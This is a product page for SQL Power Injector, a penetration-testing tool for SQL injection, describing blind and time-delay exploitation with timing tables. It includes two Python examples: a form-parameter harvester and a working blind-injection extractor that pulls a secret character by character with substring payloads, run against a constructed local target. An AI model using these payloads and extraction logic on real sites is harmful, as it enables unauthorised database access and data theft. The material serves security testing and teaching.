
Product Information

Introduction

SQL Power Injector is an application written in .NET 1.1 that helps the penetration tester find and exploit SQL injections on a web page.

For now it supports SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2, but it can be used against any DBMS through inline injection (Normal mode). In Normal mode the payload is simply the SQL fragment you would otherwise put by hand in the parameter sent to the server.

Inline SQL injection is powerful in itself, but the tool's main strength lies in the multithreaded automation of the injection. Not only can tedious and time-consuming queries be automated, the query can also be tailored so that you retrieve only what you want. This matters most for blind SQL injection, since the other ways of exploiting a SQL injection vulnerability are far more talkative and much faster when the results are displayed on the web page (a UNION SELECT rendered in an HTML table or a generated 500 error, for instance).

The automation works in one of two ways: by comparing the response against an expected result, or by time delay. In the first, the response to a true condition is compared against an error or against the response to a false condition; in the second, a condition is treated as true when the server's response is delayed by the amount configured in the application.

The main effort went into making it as painless as possible to find and exploit a SQL injection vulnerability without using any browser. That is why there is an integrated browser that displays the results of the injection, configured so that any standard SQL error is shown without the rest of the page. As with many other features of this application, there are ways to tune the server's response to make it as talkative as possible.

Another important part of this application is its ability to fetch all the parameters of the web page you need to test, whether sent by GET or by POST. There is no need for several applications or an intercepting proxy: everything is automated. In addition, a Firefox plugin can launch SQL Power Injector with all the information of the current web page together with its session context (parameters and cookies).
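The parameter harvesting described above, as an added example written for this page rather than code from SQL Power Injector or its Firefox plugin. It walks a constructed HTML page with the standard library only, collects every form (method, resolved action, named fields) and every link that carries a query string, and returns one injectable request per distinct form or link; the URLs, field names and page content are made up. Cookies are out of scope here, since they come from the session rather than the page.

```python
"""Harvest injectable GET/POST parameters from a page (added example, offline)."""
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urljoin, urlsplit


class FormHarvester(HTMLParser):
    """Collects each form (method, resolved action, named fields) and every link href."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.forms = []
        self.links = []
        self._form = None  # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # valueless attributes arrive as None
        if tag == "form":
            self._form = {
                "method": (a.get("method") or "get").upper(),
                "url": urljoin(self.base_url, a.get("action", "")),
                "params": {},
            }
            self.forms.append(self._form)
        elif tag in ("input", "select", "textarea") and self._form is not None:
            # Buttons carry no user data; every other named control is a candidate,
            # hidden fields included, because they reach the server just the same.
            if a.get("name") and a.get("type", "").lower() not in ("submit", "button", "reset", "image"):
                self._form["params"][a["name"]] = a.get("value", "")
        elif tag == "a" and a.get("href"):
            self.links.append(urljoin(self.base_url, a["href"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def harvest(html, base_url):
    """Return one entry per injectable request: forms, plus links with a query string."""
    parser = FormHarvester(base_url)
    parser.feed(html)
    parser.close()
    targets = list(parser.forms)
    seen = set()
    for link in parser.links:
        parts = urlsplit(link)
        if not parts.query:
            continue
        url = parts._replace(query="", fragment="").geturl()
        params = dict(parse_qsl(parts.query, keep_blank_values=True))
        key = (url, tuple(sorted(params)))
        if key not in seen:  # the same page with different values is one target
            seen.add(key)
            targets.append({"method": "GET", "url": url, "params": params})
    return targets


# Constructed page standing in for the site under test (hypothetical host and paths).
SAMPLE_HTML = """
<html><body>
<form method="post" action="/login.asp">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="hidden" name="token" value="abc123">
  <input type="submit" value="Log in">
</form>
<a href="product.asp?id=12&cat=3">Widget</a>
<a href="product.asp?id=13&cat=3">Gadget</a>
<a href="about.asp">About</a>
</body></html>
"""

if __name__ == "__main__":
    for target in harvest(SAMPLE_HTML, "http://target.example/"):
        print(target["method"], target["url"], target["params"])
```

Each returned entry is exactly what the injector needs to build a request: the method, the URL without its query, and the parameter names with their default values, so the payload can be substituted into any one of them.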

I worked hard on the application's usability, but I am aware that it is not obvious at first use. I am confident that once the few concepts you need are understood it becomes quite easy to use. To help a beginner understand its basic features I wrote a tutorial that also covers some advanced SQL injection techniques. You will find some useful tricks in the FAQ as well, and since version 1.2 a help file (chm) lists the most useful information for SQL injection.

I designed this application around the way I do my own pen testing and use SQL injection. It has been tested successfully many times on real-life web sites (legally, of course), and as soon as I see something missing I add it. Now that it is officially available to the security community I have to be more rigorous and hold new additions for a new version of the software. This process has already started and many more features will come with time.

Finally, this application is free of charge and will hopefully help in security assessments made by security professionals, or further the knowledge of the techniques used. Obviously I will not be held responsible for any misuse of, or damage caused by, this application.

What It's Not

Powerful as it is, this application will not find SQL injection vulnerabilities for you, nor will it find the right syntax once one is found. Its strength is to make finding them easier and, once they are found, to automate the exploitation so that you do not have to send every single injection by hand when the blind technique is the only way in.

Moreover, it is not meant to be a database-pumping application; there are plenty of good applications for that purpose. In many cases most of the pumped data is irrelevant, and since pumping takes time it can be a real waste of it. It is better to refine the query and retrieve only what you really want.

Lastly, the mini-browser that renders results as HTML does not have all the features of a professional browser. Internet Explorer and Mozilla, to name two, are complex pieces of software, and it would be nearly impossible to implement all their features in my application. That is why it cannot be used as a conventional browser even though it has the same look and feel.

Features


Differences with Other Tools

To be honest, I have not studied every other tool's features in detail. What I can say is that, good as they are, they always lack something important that I need when I am doing SQL injection.

Some applications will find the SQL injection for you, which sometimes results in false positives; others generically pump the data out of the database. Some of those have become smarter: once the list of databases has been pumped you can pick what you need, or ask for a specific hard-coded item such as the current database user.

But as far as I know none of them lets you choose specifically what you want. That ability comes at a cost, of course: you need to know some SQL syntax. I can assure you, though, that once you understand how the tool works, not much syntax is required.

I also cannot recall seeing any application with a built-in time-delay feature. Many SQL injection vulnerabilities are impossible to exploit without that technique, and done manually it is so tedious and time consuming that it often ends in giving up after long hours of copy-pasting the command into the browser.

Nor do I remember seeing a multithreading feature, which is a very significant time saver, or an ASCII character preset feature, which can save up to 25% of the requests in blind SQL injection (see the statistics section for figures).

I apologize in advance to those who made their own application with those features available on the Net before SQL Power Injector. Please let me know and I will update this section.

Summary of the differences:

Screenshots

You will find two screenshots demonstrating the two techniques used in the application: Normal and Blind.

Screen 1: SQL Power Injector with Normal technique
Screen 2: SQL Power Injector with Blind technique

Some Statistic Figures

I did not use any scientific method, so do not consider these statistics as scientific facts; they give a general idea of what you can expect. No one controls the traffic on the Net, and I would be hard pressed to produce rigorous data. Nor did I run enough tests (10 per thread count) to have a real statistical sample; the goal of these numbers is only to show approximately what to expect.

The results also depend on the size of the data sought. Sometimes fewer threads are more effective than more. The time taken is best when the length of the value is divisible by the number of threads, so that no thread sits idle in the last round: for a 24-character value, 3, 4, 6 and 8 threads will be faster than other counts. As a rule of thumb, the biggest drop in time is between 1 and 2 threads. As you can see, more is not always better; the statistics below give some examples.

Even though you can go up to 50 threads, I found that at around 10 threads errors start to appear and it gets slower and slower, so again more threads is not necessarily better. Be warned as well that the more threads you use, the higher the chance of crashing the web application (web server or database).
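The two blind-injection oracles described in the introduction (response comparison and time delay) and the two speed-ups discussed in this section (a restricted character preset and several threads), as one added example written for this page; it is not SQL Power Injector's own code. Everything in it is constructed and runs offline: an in-memory SQLite table stands in for the target's backend, FakeTarget is the vulnerable page whose id parameter is concatenated straight into SQL, the secret value, the `1 AND (...)` payload shape and the preset alphabet are assumptions, and SQLite's `unicode()`, `substr()` and `length()` play the role of the DBMS-specific functions. The 0.9 factor in the time-delay oracle is a small allowance for timer granularity.

```python
"""Blind SQL injection automation: two oracles, a character preset, threads (added example)."""
import sqlite3
import threading
import time
from concurrent.futures import ThreadPoolExecutor

SECRET = "S3cret_pa55w0rd"                # constructed value to recover
FULLSET = list(range(32, 127))            # printable ASCII
PRESET = [ord(c) for c in "0123456789_abcdefghijklmnopqrstuvwxyz"]  # a guess at the alphabet
TARGET_EXPR = "(SELECT pw FROM users WHERE id=1)"


class FakeTarget:
    """Vulnerable page: the id parameter is concatenated straight into SQL.
    With delay > 0 a matching row sleeps, emulating the WAITFOR DELAY / SLEEP()
    that a real time-delay payload would trigger on the server."""

    def __init__(self, delay=0.0):
        self.delay, self.requests = delay, 0
        self._lock = threading.Lock()
        self._db = sqlite3.connect(":memory:", check_same_thread=False)
        self._db.execute("CREATE TABLE users (id INTEGER, name TEXT, pw TEXT)")
        self._db.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET,))
        self._db.commit()

    def page(self, param):
        with self._lock:                  # the fake app serialises DB access
            self.requests += 1
            try:
                rows = self._db.execute("SELECT name FROM users WHERE id=" + param).fetchall()
            except sqlite3.Error:
                rows = []
        if rows and self.delay:
            time.sleep(self.delay)
        return "Welcome admin" if rows else "No such user"


def positive_answer_oracle(target, cond):
    """Response comparison: does the page still show the known 'true' text?"""
    return "Welcome admin" in target.page("1 AND (%s)" % cond)


def time_delay_oracle(target, cond):
    """Time delay: true when the reply took at least the configured delay
    (a real payload carries the delay itself, e.g. IF (cond) WAITFOR DELAY '0:0:3')."""
    start = time.monotonic()
    target.page("1 AND (%s)" % cond)
    return time.monotonic() - start >= 0.9 * target.delay


def bsearch(ask, expr, codes):
    """Binary search a sorted candidate list with `expr > value` questions.
    Returns (candidate, certain): certain means the two neighbours tested are
    adjacent integers, so the answers already pin the value and no confirming
    request is needed. A preset with gaps, or a value outside it, is never certain."""
    lo, hi = 0, len(codes) - 1
    below = above = None                  # tightest `> v` answered true / false
    while lo < hi:
        mid = (lo + hi) // 2
        if ask("%s > %d" % (expr, codes[mid])):
            lo, below = mid + 1, codes[mid]
        else:
            hi, above = mid, codes[mid]
    certain = below is not None and above is not None and above - below == 1
    return codes[lo], certain


def extract_value(ask, expr, codes):
    """Pin down one integer-valued expression, confirming it unless the search already did."""
    value, certain = bsearch(ask, expr, codes)
    return value if certain or ask("%s = %d" % (expr, value)) else None


def extract_char(ask, pos, preset):
    expr = "unicode(substr(%s,%d,1))" % (TARGET_EXPR, pos)
    value = extract_value(ask, expr, preset)
    if value is None and preset != FULLSET:   # preset missed this character: fall back
        value = extract_value(ask, expr, FULLSET)
    return chr(value) if value is not None else "?"


def extract(target, oracle, preset=FULLSET, threads=1):
    """Recover the secret; positions are independent, so they are spread over threads."""
    ask = lambda cond: oracle(target, cond)
    length = extract_value(ask, "length(%s)" % TARGET_EXPR, list(range(0, 65)))
    if length is None:
        raise RuntimeError("could not determine length")
    with ThreadPoolExecutor(max_workers=threads) as pool:
        chars = pool.map(lambda p: extract_char(ask, p, preset), range(1, length + 1))
    return "".join(chars)


def rounds_needed(length, threads):
    """Rounds of parallel requests; no thread idles when threads divides length."""
    return -(-length // threads)


def run_demo(threads=4):
    results = {}
    for label, preset in (("fullset", FULLSET), ("optimized", PRESET)):
        target = FakeTarget()
        results[label] = (extract(target, positive_answer_oracle, preset, threads), target.requests)
    target = FakeTarget(delay=0.1)
    results["time-delay"] = (extract(target, time_delay_oracle, FULLSET, threads), target.requests)
    return results


if __name__ == "__main__":
    for label, (value, count) in run_demo().items():
        print("%-10s %r in %d requests" % (label, value, count))
```

The preset saves requests because a 37-symbol alphabet needs fewer comparisons than 95 printable characters, but a preset can be wrong: the uppercase S in the constructed secret is not in it, the confirming request catches that, and the character is redone against the full set. That safety check costs one request for every character that sits next to a gap in the preset, which is why the saving is a fraction rather than a fixed amount.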

I must thank Nathaniel Felsen for allowing me to test on one of his web servers.

Here are the characteristics of the computer used to make the tests:

With positive answer option

6 characters

Threads | Fullset: time taken | Fullset: requests | Optimized: time taken | Optimized: requests
1       | ~36 s 0 ms          | 61                | ~26 s 193 ms          | 43
2       | ~20 s 314 ms        | 61                | ~15 s 561 ms          | 43
3       | ~20 s 883 ms        | 61                | ~15 s 755 ms          | 43
4       | ~22 s 705 ms        | 70                | ~17 s 540 ms          | 49
5       | ~22 s 14 ms         | 61                | ~17 s 171 ms          | 43
6       | ~19 s 878 ms        | 61                | ~15 s 227 ms          | 43

11 characters

Threads | Fullset: time taken | Fullset: requests | Optimized: time taken | Optimized: requests
1       | ~1 m 1 s 910 ms     | 106               | ~47 s 840 ms          | 80
2       | ~35 s 492 ms        | 106               | ~26 s 350 ms          | 80
3       | ~35 s 157 ms        | 106               | ~28 s 220 ms          | 80
4       | ~33 s 638 ms        | 106               | ~26 s 607 ms          | 80
5       | ~35 s 280 ms        | 106               | ~26 s 403 ms          | 80
6       | ~32 s 426 ms        | 106               | ~26 s 983 ms          | 80
7       | ~35 s 162 ms        | 115               | ~28 s 858 ms          | 86
8       | ~40 s 590 ms        | 106               | ~28 s 972 ms          | 80

23 characters

Threads | Fullset: time taken | Fullset: requests | Optimized: time taken | Optimized: requests
1       | ~2 m 4 s 37 ms      | 214               | ~1 m 45 s 905 ms      | 175
2       | ~1 m 6 s 57 ms      | 214               | ~57 s 552 ms          | 175
3       | ~1 m 6 s 418 ms     | 214               | ~56 s 714 ms          | 175
4       | ~1 m 3 s 759 ms     | 214               | ~54 s 575 ms          | 175
5       | ~1 m 3 s 57 ms      | 214               | ~53 s 743 ms          | 175
6       | ~1 m 2 s 995 ms     | 214               | ~53 s 750 ms          | 175
7       | ~1 m 7 s 870 ms     | 214               | ~59 s 178 ms          | 175
8       | ~1 m 3 s 285 ms     | 214               | ~52 s 938 ms          | 175

187 characters

Threads | Fullset: time taken | Fullset: requests | Optimized: time taken | Optimized: requests
1       | ~16 m 42 s 991 ms   | 1692              | ~13 m 16 s 31 ms      | 1303
2       | ~8 m 32 s 604 ms    | 1692              | ~6 m 34 s 562 ms      | 1303
3       | ~8 m 24 s 751 ms    | 1692              | ~6 m 41 s 286 ms      | 1303
4       | ~8 m 9 s 943 ms     | 1692              | ~6 m 25 s 358 ms      | 1303
5       | ~8 m 10 s 97 ms     | 1692              | ~6 m 35 s 30 ms       | 1303
6       | ~8 m 12 s 256 ms    | 1692              | ~6 m 24 s 839 ms      | 1303
7       | ~8 m 14 s 811 ms    | 1692              | ~6 m 25 s 531 ms      | 1303
8       | ~8 m 13 s 168 ms    | 1692              | ~6 m 28 s 909 ms      | 1303

With time delay of 3 seconds

6 characters

Threads | Fullset: time taken | Fullset: requests | Optimized: time taken | Optimized: requests
1       | ~2 m 3 s 337 ms     | 62                | ~1 m 40 s 941 ms      | 44
2       | ~1 m 17 s 114 ms    | 62                | ~1 m 7 s 308 ms       | 44
3       | ~1 m 16 s 273 ms    | 62                | ~1 m 4 s 770 ms       | 44
4       | ~1 m 22 s 970 ms    | 71                | ~1 m 8 s 701 ms       | 50
5       | ~1 m 17 s 349 ms    | 62                | ~1 m 4 s 448 ms       | 44
6       | ~1 m 13 s 998 ms    | 62                | ~1 m 1 s 981 ms       | 44

11 characters

Threads | Fullset: time taken | Fullset: requests | Optimized: time taken | Optimized: requests
1       | ~3 m 27 s 825 ms    | 107               | ~2 m 42 s 829 ms      | 80
2       | ~1 m 54 s 687 ms    | 107               | ~1 m 36 s 265 ms      | 80
3       | ~1 m 56 s 737 ms    | 107               | ~1 m 32 s 425 ms      | 80
4       | ~1 m 51 s 883 ms    | 107               | ~1 m 29 s 994 ms      | 80
5       | ~2 m 4 s 263 ms     | 107               | ~1 m 38 s 55 ms       | 80
6       | ~1 m 54 s 239 ms    | 107               | ~1 m 38 s 112 ms      | 80
7       | ~2 m 2 s 25 ms      | 116               | ~1 m 41 s 341 ms      | 80
8       | ~2 m 19 s 62 ms     | 107               | ~1 m 57 s 104 ms      | 80

23 characters

Threads | Fullset: time taken | Fullset: requests | Optimized: time taken | Optimized: requests
1       | ~7 m 4 s 531 ms     | 215               | ~6 m 11 s 70 ms       | 176
2       | ~3 m 42 s 679 ms    | 215               | ~3 m 31 s 982 ms      | 176
3       | ~3 m 41 s 82 ms     | 215               | ~3 m 23 s 911 ms      | 176
4       | ~3 m 41 s 791 ms    | 215               | ~3 m 22 s 364 ms      | 176
5       | ~3 m 43 s 176 ms    | 215               | ~3 m 17 s 817 ms      | 176
6       | ~3 m 38 s 604 ms    | 215               | ~3 m 22 s 348 ms      | 176
7       | ~3 m 58 s 906 ms    | 215               | ~3 m 41 s 586 ms      | 176
8       | ~3 m 38 s 255 ms    | 215               | ~3 m 13 s 52 ms       | 176

187 characters

Threads | Fullset: time taken | Fullset: requests | Optimized: time taken | Optimized: requests
1       | ~59 m 19 s 88 ms    | 1692              | ~44 m 2 s 421 ms      | 1296
2       | ~30 m 50 s 515 ms   | 1692              | ~22 m 36 s 765 ms     | 1296
3       | ~30 m 27 s 572 ms   | 1692              | ~22 m 43 s 10 ms      | 1296
4       | ~30 m 10 s 437 ms   | 1692              | ~21 m 56 s 114 ms     | 1296
5       | ~29 m 48 s 328 ms   | 1692              | ~31 m 57 s 703 ms     | 1296
6       | ~29 m 41 s 322 ms   | 1692              | ~22 m 7 s 432 ms      | 1296
7       | ~29 m 26 s 499 ms   | 1693              | ~22 m 484 ms          | 1296
8       | ~30 m 17 s 641 ms   | 1692              | ~22 m 17 s 234 ms     | 1296

Copyright © 2006-2014 Francois Larouche